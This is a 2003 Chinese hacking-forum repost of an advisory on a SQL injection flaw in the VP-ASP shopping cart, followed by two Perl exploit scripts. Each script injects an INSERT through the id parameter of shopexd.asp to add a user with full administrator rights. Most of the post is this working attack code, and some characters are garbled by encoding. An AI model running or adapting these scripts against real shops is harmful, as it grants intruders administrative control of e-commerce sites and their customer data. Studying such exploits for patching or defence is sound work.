黑色海岸线论坛 - Powered by Discuz! Board

标题: [转帖] VPASP SQL漏洞及利用代码 [打印本页]

作者: li899 时间: 2003-7-6 00:41 标题: [转帖] VPASP SQL漏洞及利用代码

VPASP SQL漏洞及利用代码 Joker@safechina.net www.safechina.net 日期: 05/07/2003 平台: Win32/MSSQL 级别: 高 BUG类型: SQL入侵发现者: AresU & TioEuy 厂商网址: http://www.vpasp.com/ 介绍: VP-ASP是一个应用于超过70个国家，功能强大的电子商务解决方案 VP-ASP的特点是使用方便和强大的无限制的客户定制功能更深入的了解请看http://www.vpasp.com itself. 细节: 当我们阅读vpasp的源代码时,我们在shopexd.asp发现一个漏洞.利用这个漏洞并不难. 以管理员权限添加一个新用户即可获得Web界面管理的全部权限. Exploits/POC:（用/usr/bin/perl -w 运行）《Code 1》 $pamer = " use LWP::UserAgent; # LWP Mode sorry im lazy :) use HTTP::Request; use HTTP::Response; $│ = 1; print $pamer; if ($#ARGV<3){ print "\n Usage: perl tio-fux.pl

\n\n"; exit; } my $biji = "1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29"; $tio = "$ARGV[0]/shopexd.asp?id=$ARGV[1]"; $tio .= ";insert into tbluser (\"fldusername\",\"fldpassword\",\"fldaccess\") "; $tio .= "values ('$ARGV[2]','$ARGV[3]','$biji')--"; my $bosen = LWP::UserAgent->new(); my $gembel = HTTP::Request->new(GET => $tio); my $dodol = $bosen->request($gembel); if ($dodol->is_error()) { printf " s\n", $dodol->status_line; } else { print "Tuing !\n"; } print "\n680165\n"; --END-- 《Code 2》 -------- #!/usr/bin/perl # ============================== # VP-ASP Shopping Cart - Exploit use Socket; $dodolbasik = "tioeuy.pl, VPASP exploit by TioEuy&AresU "; $aksesnya ="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29"; $pieldnya = '"fldusername","fldpassword","fldaccess"'; if ($#ARGV<4) { print "\n$dodolbasik"; print "\n\n Usage: perl tioeuy.pl \n\n"; exit; } $kupret="$ARGV[1]shopexd.asp?id=$ARGV[2];insert into tbluser ($pieldnya) values ('$ARGV[3]','$ARGV[4]','$aksesnya')--"; $kupret=~s/\ /20/g; $kupret="GET $kupret HTTP/1.0\r\nHost: $ARGV[0]\r\n\r\n"; print $kupret; $port=80; $host=$ARGV[0]; $target = inet_aton($host); @hasil=sendraw($kupret); print $gembel; print @hasil; sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')││0) ││ die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $│=1; print $pstr; while(){ push @in, $_;} select(STDOUT); close(S); return @in; } } --END--

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2